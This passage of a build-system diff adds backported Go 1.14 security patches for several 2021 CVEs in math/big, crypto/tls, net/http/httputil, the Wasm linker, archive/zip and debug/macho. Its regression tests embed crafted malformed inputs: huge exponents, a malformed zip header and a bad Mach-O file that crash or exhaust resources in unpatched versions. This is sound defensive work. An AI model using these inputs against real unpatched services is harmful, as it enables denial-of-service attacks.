35 src/math/big/ratconv_test.go | 25 +++++++++++++++++++++++++
36 2 files changed, 33 insertions(+), 7 deletions(-)
37
38diff --git a/src/math/big/ratconv.go b/src/math/big/ratconv.go
39index e8cbdbe..90053a9 100644
40--- a/src/math/big/ratconv.go
41+++ b/src/math/big/ratconv.go
42@@ -51,7 +51,8 @@ func (z *Rat) Scan(s fmt.ScanState, ch rune) error {
43 // An optional base-10 ``e'' or base-2 ``p'' (or their upper-case variants)
44 // exponent may be provided as well, except for hexadecimal floats which
45 // only accept an (optional) ``p'' exponent (because an ``e'' or ``E'' cannot
46-// be distinguished from a mantissa digit).
47+// be distinguished from a mantissa digit). If the exponent's absolute value
48+// is too large, the operation may fail.
49 // The entire string, not just a prefix, must be valid for success. If the
50 // operation failed, the value of z is undefined but the returned value is nil.
51 func (z *Rat) SetString(s string) (*Rat, bool) {
52@@ -174,6 +175,9 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
53 return nil, false
54 }
55 }
56+ if n > 1e6 {
57+ return nil, false // avoid excessively large exponents
58+ }
59 pow5 := z.b.abs.expNN(natFive, nat(nil).setWord(Word(n)), nil) // use underlying array of z.b.abs
60 if exp5 > 0 {
61 z.a.abs = z.a.abs.mul(z.a.abs, pow5)
62@@ -186,15 +190,12 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
63 }
64
65 // apply exp2 contributions
66+ if exp2 < -1e7 || exp2 > 1e7 {
67+ return nil, false // avoid excessively large exponents
68+ }
69 if exp2 > 0 {
70- if int64(uint(exp2)) != exp2 {
71- panic("exponent too large")
72- }
73 z.a.abs = z.a.abs.shl(z.a.abs, uint(exp2))
74 } else if exp2 < 0 {
75- if int64(uint(-exp2)) != -exp2 {
76- panic("exponent too large")
77- }
78 z.b.abs = z.b.abs.shl(z.b.abs, uint(-exp2))
79 }
80
81diff --git a/src/math/big/ratconv_test.go b/src/math/big/ratconv_test.go
82index b820df4..e55e655 100644
83--- a/src/math/big/ratconv_test.go
84+++ b/src/math/big/ratconv_test.go
85@@ -590,3 +590,28 @@ func TestIssue31184(t *testing.T) {
86 }
87 }
88 }
89+
90+func TestIssue45910(t *testing.T) {
91+ var x Rat
92+ for _, test := range []struct {
93+ input string
94+ want bool
95+ }{
96+ {"1e-1000001", false},
97+ {"1e-1000000", true},
98+ {"1e+1000000", true},
99+ {"1e+1000001", false},
100+
101+ {"0p1000000000000", true},
102+ {"1p-10000001", false},
103+ {"1p-10000000", true},
104+ {"1p+10000000", true},
105+ {"1p+10000001", false},
106+ {"1.770p02041010010011001001", false}, // test case from issue
107+ } {
108+ _, got := x.SetString(test.input)
109+ if got != test.want {
110+ t.Errorf("SetString(%s) got ok = %v; want %v", test.input, got, test.want)
111+ }
112+ }
113+}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch
new file mode 100644
index 0000000000..8fb346d622
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch
@@ -0,0 +1,51 @@
1From a98589711da5e9d935e8d690cfca92892e86d557 Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <roland@golang.org>
3Date: Wed, 9 Jun 2021 11:31:27 -0700
4Subject: [PATCH] crypto/tls: test key type when casting
5
6When casting the certificate public key in generateClientKeyExchange,
7check the type is appropriate. This prevents a panic when a server
8agrees to a RSA based key exchange, but then sends an ECDSA (or
9other) certificate.
10
11Fixes #47143
12Fixes CVE-2021-34558
13
14Thanks to Imre Rad for reporting this issue.
15
16Change-Id: Iabccacca6052769a605cccefa1216a9f7b7f6aea
17Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1116723
18Reviewed-by: Filippo Valsorda <valsorda@google.com>
19Reviewed-by: Katie Hockman <katiehockman@google.com>
20Reviewed-on: https://go-review.googlesource.com/c/go/+/334031
21Trust: Filippo Valsorda <filippo@golang.org>
22Run-TryBot: Filippo Valsorda <filippo@golang.org>
23TryBot-Result: Go Bot <gobot@golang.org>
24Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
25
26Upstream-Status: Backport
27https://github.com/golang/go/commit/a98589711da5e9d935e8d690cfca92892e86d557
28CVE: CVE-2021-34558
29Signed-off-by: Armin Kuster <akuster@mvista.com>
30
31---
32 src/crypto/tls/key_agreement.go | 6 +++++-
33 1 file changed, 5 insertions(+), 1 deletion(-)
34
35Index: go/src/crypto/tls/key_agreement.go
36===================================================================
37--- go.orig/src/crypto/tls/key_agreement.go
38+++ go/src/crypto/tls/key_agreement.go
39@@ -67,7 +67,11 @@ func (ka rsaKeyAgreement) generateClient
40 return nil, nil, err
41 }
42
43- encrypted, err := rsa.EncryptPKCS1v15(config.rand(), cert.PublicKey.(*rsa.PublicKey), preMasterSecret)
44+ rsaKey, ok := cert.PublicKey.(*rsa.PublicKey)
45+ if !ok {
46+ return nil, nil, errors.New("tls: server certificate contains incorrect key type for selected ciphersuite")
47+ }
48+ encrypted, err := rsa.EncryptPKCS1v15(config.rand(), rsaKey, preMasterSecret)
49 if err != nil {
50 return nil, nil, err
51 }
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch
new file mode 100644
index 0000000000..9c00d4ebb2
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch
@@ -0,0 +1,101 @@
1From b7a85e0003cedb1b48a1fd3ae5b746ec6330102e Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Wed, 7 Jul 2021 16:34:34 -0700
4Subject: [PATCH] net/http/httputil: close incoming ReverseProxy request body
5
6Reading from an incoming request body after the request handler aborts
7with a panic can cause a panic, becuse http.Server does not (contrary
8to its documentation) close the request body in this case.
9
10Always close the incoming request body in ReverseProxy.ServeHTTP to
11ensure that any in-flight outgoing requests using the body do not
12read from it.
13
14Updates #46866
15Fixes CVE-2021-36221
16
17Change-Id: I310df269200ad8732c5d9f1a2b00de68725831df
18Reviewed-on: https://go-review.googlesource.com/c/go/+/333191
19Trust: Damien Neil <dneil@google.com>
20Reviewed-by: Brad Fitzpatrick <bradfitz@golang.org>
21Reviewed-by: Filippo Valsorda <filippo@golang.org>
22
23https://github.com/golang/go/commit/b7a85e0003cedb1b48a1fd3ae5b746ec6330102e
24CVE: CVE-2021-36221
25Upstream-Status: Backport
26Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
27---
28 src/net/http/httputil/reverseproxy.go | 9 +++++
29 src/net/http/httputil/reverseproxy_test.go | 39 ++++++++++++++++++++++
30 2 files changed, 48 insertions(+)
31
32diff --git a/src/net/http/httputil/reverseproxy.go b/src/net/http/httputil/reverseproxy.go
33index 5d39955d62d15..8b63368386f43 100644
34--- a/src/net/http/httputil/reverseproxy.go
35+++ b/src/net/http/httputil/reverseproxy.go
36@@ -235,6 +235,15 @@ func (p *ReverseProxy) ServeHTTP(rw http.ResponseWriter, req *http.Request) {
37 if req.ContentLength == 0 {
38 outreq.Body = nil // Issue 16036: nil Body for http.Transport retries
39 }
40+ if outreq.Body != nil {
41+ // Reading from the request body after returning from a handler is not
42+ // allowed, and the RoundTrip goroutine that reads the Body can outlive
43+ // this handler. This can lead to a crash if the handler panics (see
44+ // Issue 46866). Although calling Close doesn't guarantee there isn't
45+ // any Read in flight after the handle returns, in practice it's safe to
46+ // read after closing it.
47+ defer outreq.Body.Close()
48+ }
49 if outreq.Header == nil {
50 outreq.Header = make(http.Header) // Issue 33142: historical behavior was to always allocate
51 }
52diff --git a/src/net/http/httputil/reverseproxy_test.go b/src/net/http/httputil/reverseproxy_test.go
53index 1898ed8b8afde..4b6ad77a29466 100644
54--- a/src/net/http/httputil/reverseproxy_test.go
55+++ b/src/net/http/httputil/reverseproxy_test.go
56@@ -1122,6 +1122,45 @@ func TestReverseProxy_PanicBodyError(t *testing.T) {
57 rproxy.ServeHTTP(httptest.NewRecorder(), req)
58 }
59
60+// Issue #46866: panic without closing incoming request body causes a panic
61+func TestReverseProxy_PanicClosesIncomingBody(t *testing.T) {
62+ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
63+ out := "this call was relayed by the reverse proxy"
64+ // Coerce a wrong content length to induce io.ErrUnexpectedEOF
65+ w.Header().Set("Content-Length", fmt.Sprintf("%d", len(out)*2))
66+ fmt.Fprintln(w, out)
67+ }))
68+ defer backend.Close()
69+ backendURL, err := url.Parse(backend.URL)
70+ if err != nil {
71+ t.Fatal(err)
72+ }
73+ proxyHandler := NewSingleHostReverseProxy(backendURL)
74+ proxyHandler.ErrorLog = log.New(io.Discard, "", 0) // quiet for tests
75+ frontend := httptest.NewServer(proxyHandler)
76+ defer frontend.Close()
77+ frontendClient := frontend.Client()
78+
79+ var wg sync.WaitGroup
80+ for i := 0; i < 2; i++ {
81+ wg.Add(1)
82+ go func() {
83+ defer wg.Done()
84+ for j := 0; j < 10; j++ {
85+ const reqLen = 6 * 1024 * 1024
86+ req, _ := http.NewRequest("POST", frontend.URL, &io.LimitedReader{R: neverEnding('x'), N: reqLen})
87+ req.ContentLength = reqLen
88+ resp, _ := frontendClient.Transport.RoundTrip(req)
89+ if resp != nil {
90+ io.Copy(io.Discard, resp.Body)
91+ resp.Body.Close()
92+ }
93+ }
94+ }()
95+ }
96+ wg.Wait()
97+}
98+
99 func TestSelectFlushInterval(t *testing.T) {
100 tests := []struct {
101 name string
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch
new file mode 100644
index 0000000000..24ceabf808
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch
@@ -0,0 +1,97 @@
1From 4548fcc8dfd933c237f29bba6f90040a85922564 Mon Sep 17 00:00:00 2001
2From: Michael Knyszek <mknyszek@google.com>
3Date: Thu, 2 Sep 2021 16:51:59 -0400
4Subject: [PATCH] [release-branch.go1.16] misc/wasm, cmd/link: do not let
5 command line args overwrite global data
6
7On Wasm, wasm_exec.js puts command line arguments at the beginning
8of the linear memory (following the "zero page"). Currently there
9is no limit for this, and a very long command line can overwrite
10the program's data section. Prevent this by limiting the command
11line to 4096 bytes, and in the linker ensuring the data section
12starts at a high enough address (8192).
13
14(Arguably our address assignment on Wasm is a bit confusing. This
15is the minimum fix I can come up with.)
16
17Thanks to Ben Lubar for reporting this issue.
18
19Change by Cherry Mui <cherryyz@google.com>.
20
21For #48797
22Fixes #48799
23Fixes CVE-2021-38297
24
25Change-Id: I0f50fbb2a5b6d0d047e3c134a88988d9133e4ab3
26Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1205933
27Reviewed-by: Roland Shoemaker <bracewell@google.com>
28Reviewed-by: Than McIntosh <thanm@google.com>
29Reviewed-on: https://go-review.googlesource.com/c/go/+/354591
30Trust: Michael Knyszek <mknyszek@google.com>
31Reviewed-by: Heschi Kreinick <heschi@google.com>
32
33CVE: CVE-2021-38297
34
35Upstream-Status: Backport:
36https://github.com/golang/go/commit/4548fcc8dfd933c237f29bba6f90040a85922564
37
38Inline of ctxt.isWAsm followin this implemetation:
39https://github.com/golang/go/blob/4548fcc8dfd933c237f29bba6f90040a85922564/src/cmd/link/internal/ld/target.go#L127
40
41Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
42---
43 misc/wasm/wasm_exec.js | 7 +++++++
44 src/cmd/link/internal/ld/data.go | 11 ++++++++++-
45 2 files changed, 17 insertions(+), 1 deletion(-)
46
47diff --git a/misc/wasm/wasm_exec.js b/misc/wasm/wasm_exec.js
48index 82041e6bb901..a0a264278b1b 100644
49--- a/misc/wasm/wasm_exec.js
50+++ b/misc/wasm/wasm_exec.js
51@@ -564,6 +564,13 @@
52 offset += 8;
53 });
54
55+ // The linker guarantees global data starts from at least wasmMinDataAddr.
56+ // Keep in sync with cmd/link/internal/ld/data.go:wasmMinDataAddr.
57+ const wasmMinDataAddr = 4096 + 4096;
58+ if (offset >= wasmMinDataAddr) {
59+ throw new Error("command line too long");
60+ }
61+
62 this._inst.exports.run(argc, argv);
63 if (this.exited) {
64 this._resolveExitPromise();
65diff --git a/src/cmd/link/internal/ld/data.go b/src/cmd/link/internal/ld/data.go
66index 52035e96301c..54a1d188cdb9 100644
67--- a/src/cmd/link/internal/ld/data.go
68+++ b/src/cmd/link/internal/ld/data.go
69@@ -2330,6 +2330,11 @@ func assignAddress(ctxt *Link, sect *sym.Section, n int, s loader.Sym, va uint64
70 return sect, n, va
71 }
72
73+// On Wasm, we reserve 4096 bytes for zero page, then 4096 bytes for wasm_exec.js
74+// to store command line args. Data sections starts from at least address 8192.
75+// Keep in sync with wasm_exec.js.
76+const wasmMinDataAddr = 4096 + 4096
77+
78 // address assigns virtual addresses to all segments and sections and
79 // returns all segments in file order.
80 func (ctxt *Link) address() []*sym.Segment {
81@@ -2339,10 +2344,14 @@ func (ctxt *Link) address() []*sym.Segment {
82 order = append(order, &Segtext)
83 Segtext.Rwx = 05
84 Segtext.Vaddr = va
85- for _, s := range Segtext.Sections {
86+ for i, s := range Segtext.Sections {
87 va = uint64(Rnd(int64(va), int64(s.Align)))
88 s.Vaddr = va
89 va += s.Length
90+
91+ if ctxt.Arch.Family == sys.Wasm && i == 0 && va < wasmMinDataAddr {
92+ va = wasmMinDataAddr
93+ }
94 }
95
96 Segtext.Length = va - uint64(*FlagTextAddr)
97 \ No newline at end of file
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch
new file mode 100644
index 0000000000..88fca9cad9
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch
@@ -0,0 +1,79 @@
1From 6c480017ae600b2c90a264a922e041df04dfa785 Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <roland@golang.org>
3Date: Wed, 18 Aug 2021 11:49:29 -0700
4Subject: [PATCH] [release-branch.go1.16] archive/zip: prevent preallocation
5 check from overflowing
6
7If the indicated directory size in the archive header is so large that
8subtracting it from the archive size overflows a uint64, the check that
9the indicated number of files in the archive can be effectively
10bypassed. Prevent this from happening by checking that the indicated
11directory size is less than the size of the archive.
12
13Thanks to the OSS-Fuzz project for discovering this issue and to
14Emmanuel Odeke for reporting it.
15
16Fixes #47985
17Updates #47801
18Fixes CVE-2021-39293
19
20Change-Id: Ifade26b98a40f3b37398ca86bd5252d12394dd24
21Reviewed-on: https://go-review.googlesource.com/c/go/+/343434
22Trust: Roland Shoemaker <roland@golang.org>
23Run-TryBot: Roland Shoemaker <roland@golang.org>
24TryBot-Result: Go Bot <gobot@golang.org>
25Reviewed-by: Russ Cox <rsc@golang.org>
26(cherry picked from commit bacbc33439b124ffd7392c91a5f5d96eca8c0c0b)
27Reviewed-on: https://go-review.googlesource.com/c/go/+/345409
28Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
29Run-TryBot: Emmanuel Odeke <emmanuel@orijtech.com>
30Trust: Cherry Mui <cherryyz@google.com>
31
32https://github.com/golang/go/commit/6c480017ae600b2c90a264a922e041df04dfa785
33CVE: CVE-2021-39293
34Upstream-Status: Backport
35Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
36---
37 src/archive/zip/reader.go | 2 +-
38 src/archive/zip/reader_test.go | 18 ++++++++++++++++++
39 2 files changed, 19 insertions(+), 1 deletion(-)
40
41diff --git a/src/archive/zip/reader.go b/src/archive/zip/reader.go
42index ddef2b7b5a517..801d1313b6c32 100644
43--- a/src/archive/zip/reader.go
44+++ b/src/archive/zip/reader.go
45@@ -105,7 +105,7 @@ func (z *Reader) init(r io.ReaderAt, size int64) error {
46 // indicate it contains up to 1 << 128 - 1 files. Since each file has a
47 // header which will be _at least_ 30 bytes we can safely preallocate
48 // if (data size / 30) >= end.directoryRecords.
49- if (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
50+ if end.directorySize < uint64(size) && (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
51 z.File = make([]*File, 0, end.directoryRecords)
52 }
53 z.Comment = end.comment
54diff --git a/src/archive/zip/reader_test.go b/src/archive/zip/reader_test.go
55index 471be27bb1004..99f13345d8d06 100644
56--- a/src/archive/zip/reader_test.go
57+++ b/src/archive/zip/reader_test.go
58@@ -1225,3 +1225,21 @@ func TestCVE202133196(t *testing.T) {
59 t.Errorf("Archive has unexpected number of files, got %d, want 5", len(r.File))
60 }
61 }
62+
63+func TestCVE202139293(t *testing.T) {
64+ // directory size is so large, that the check in Reader.init
65+ // overflows when subtracting from the archive size, causing
66+ // the pre-allocation check to be bypassed.
67+ data := []byte{
68+ 0x50, 0x4b, 0x06, 0x06, 0x05, 0x06, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x4b,
69+ 0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
70+ 0x00, 0x00, 0x50, 0x4b, 0x05, 0x06, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x4b,
71+ 0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
72+ 0x00, 0x00, 0x00, 0x50, 0x4b, 0x05, 0x06, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
73+ 0xff, 0x50, 0xfe, 0x00, 0xff, 0x00, 0x3a, 0x00, 0x00, 0x00, 0xff,
74+ }
75+ _, err := NewReader(bytes.NewReader(data), int64(len(data)))
76+ if err != ErrFormat {
77+ t.Fatalf("unexpected error, got: %v, want: %v", err, ErrFormat)
78+ }
79+}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch
new file mode 100644
index 0000000000..526796dbcb
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch
@@ -0,0 +1,86 @@
1From d19c5bdb24e093a2d5097b7623284eb02726cede Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <roland@golang.org>
3Date: Thu, 14 Oct 2021 13:02:01 -0700
4Subject: [PATCH] [release-branch.go1.16] debug/macho: fail on invalid dynamic
5 symbol table command
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10Fail out when loading a file that contains a dynamic symbol table
11command that indicates a larger number of symbols than exist in the
12loaded symbol table.
13
14Thanks to Burak Çarıkçı - Yunus Yıldırım (CT-Zer0 Crypttech) for
15reporting this issue.
16
17Updates #48990
18Fixes #48991
19Fixes CVE-2021-41771
20
21Change-Id: Ic3d6e6529241afcc959544b326b21b663262bad5
22Reviewed-on: https://go-review.googlesource.com/c/go/+/355990
23Reviewed-by: Julie Qiu <julie@golang.org>
24Reviewed-by: Katie Hockman <katie@golang.org>
25Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
26Run-TryBot: Roland Shoemaker <roland@golang.org>
27TryBot-Result: Go Bot <gobot@golang.org>
28Trust: Katie Hockman <katie@golang.org>
29(cherry picked from commit 61536ec03063b4951163bd09609c86d82631fa27)
30Reviewed-on: https://go-review.googlesource.com/c/go/+/359454
31Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
32
33https://github.com/golang/go/commit/d19c5bdb24e093a2d5097b7623284eb02726cede
34CVE: CVE-2021-41771
35Upstream-Status: Backport
36Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
37---
38 src/debug/macho/file.go | 9 +++++++++
39 src/debug/macho/file_test.go | 7 +++++++
40 .../testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64 | 1 +
41 3 files changed, 17 insertions(+)
42 create mode 100644 src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
43
44diff --git a/src/debug/macho/file.go b/src/debug/macho/file.go
45index 085b0c8219bad..73cfce3c7606e 100644
46--- a/src/debug/macho/file.go
47+++ b/src/debug/macho/file.go
48@@ -345,6 +345,15 @@ func NewFile(r io.ReaderAt) (*File, error) {
49 if err := binary.Read(b, bo, &hdr); err != nil {
50 return nil, err
51 }
52+ if hdr.Iundefsym > uint32(len(f.Symtab.Syms)) {
53+ return nil, &FormatError{offset, fmt.Sprintf(
54+ "undefined symbols index in dynamic symbol table command is greater than symbol table length (%d > %d)",
55+ hdr.Iundefsym, len(f.Symtab.Syms)), nil}
56+ } else if hdr.Iundefsym+hdr.Nundefsym > uint32(len(f.Symtab.Syms)) {
57+ return nil, &FormatError{offset, fmt.Sprintf(
58+ "number of undefined symbols after index in dynamic symbol table command is greater than symbol table length (%d > %d)",
59+ hdr.Iundefsym+hdr.Nundefsym, len(f.Symtab.Syms)), nil}
60+ }
61 dat := make([]byte, hdr.Nindirectsyms*4)
62 if _, err := r.ReadAt(dat, int64(hdr.Indirectsymoff)); err != nil {
63 return nil, err
64diff --git a/src/debug/macho/file_test.go b/src/debug/macho/file_test.go
65index 03915c86e23d9..9beeb80dd27c1 100644
66--- a/src/debug/macho/file_test.go
67+++ b/src/debug/macho/file_test.go
68@@ -416,3 +416,10 @@ func TestTypeString(t *testing.T) {
69 t.Errorf("got %v, want %v", TypeExec.GoString(), "macho.Exec")
70 }
71 }
72+
73+func TestOpenBadDysymCmd(t *testing.T) {
74+ _, err := openObscured("testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64")
75+ if err == nil {
76+ t.Fatal("openObscured did not fail when opening a file with an invalid dynamic symbol table command")
77+ }
78+}
79diff --git a/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64 b/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
80new file mode 100644
81index 0000000000000..8e0436639c109
82--- /dev/null
83+++ b/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
84@@ -0,0 +1 @@
85+z/rt/gcAAAEDAACAAgAAAAsAAABoBQAAhQAAAAAAAAAZAAAASAAAAF9fUEFHRVpFUk8AAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAA2AEAAF9fVEVYVAAAAAAAAAAAAAAAAAAAAQAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAcAAAAFAAAABQAAAAAAAABfX3RleHQAAAAAAAAAAAAAX19URVhUAAAAAAAAAAAAABQPAAABAAAAbQAAAAAAAAAUDwAAAgAAAAAAAAAAAAAAAAQAgAAAAAAAAAAAAAAAAF9fc3ltYm9sX3N0dWIxAABfX1RFWFQAAAAAAAAAAAAAgQ8AAAEAAAAMAAAAAAAAAIEPAAAAAAAAAAAAAAAAAAAIBACAAAAAAAYAAAAAAAAAX19zdHViX2hlbHBlcgAAAF9fVEVYVAAAAAAAAAAAAACQDwAAAQAAABgAAAAAAAAAkA8AAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABfX2NzdHJpbmcAAAAAAAAAX19URVhUAAAAAAAAAAAAAKgPAAABAAAADQAAAAAAAACoDwAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAF9fZWhfZnJhbWUAAAAAAABfX1RFWFQAAAAAAAAAAAAAuA8AAAEAAABIAAAAAAAAALgPAAADAAAAAAAAAAAAAAALAABgAAAAAAAAAAAAAAAAGQAAADgBAABfX0RBVEEAAAAAAAAAAAAAABAAAAEAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAAAAAHAAAAAwAAAAMAAAAAAAAAX19kYXRhAAAAAAAAAAAAAF9fREFUQQAAAAAAAAAAAAAAEAAAAQAAABwAAAAAAAAAABAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABfX2R5bGQAAAAAAAAAAAAAX19EQVRBAAAAAAAAAAAAACAQAAABAAAAOAAAAAAAAAAgEAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF9fbGFfc3ltYm9sX3B0cgBfX0RBVEEAAAAAAAAAAAAAWBAAAAEAAAAQAAAAAAAAAFgQAAACAAAAAAAAAAAAAAAHAAAAAgAAAAAAAAAAAAAAGQAAAEgAAABfX0xJTktFRElUAAAAAAAAACAAAAEAAAAAEAAAAAAAAAAgAAAAAAAAQAEAAAAAAAAHAAAAAQAAAAAAAAAAAAAAAgAAABgAAAAAIAAACwAAAMAgAACAAAAACwAAAFAAAAAAAAAAAgAAAAIAAAAHAAAACQAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwIAAABAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAIAAAAAwAAAAvdXNyL2xpYi9keWxkAAAAAAAAABsAAAAYAAAAOyS4cg5FdtQoqu6JsMEhXQUAAAC4AAAABAAAACoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQPAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAOAAAABgAAAACAAAAAAABAAAAAQAvdXNyL2xpYi9saWJnY2Nfcy4xLmR5bGliAAAAAAAAAAwAAAA4AAAAGAAAAAIAAAAEAW8AAAABAC91c3IvbGliL2xpYlN5c3RlbS5CLmR5bGliAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA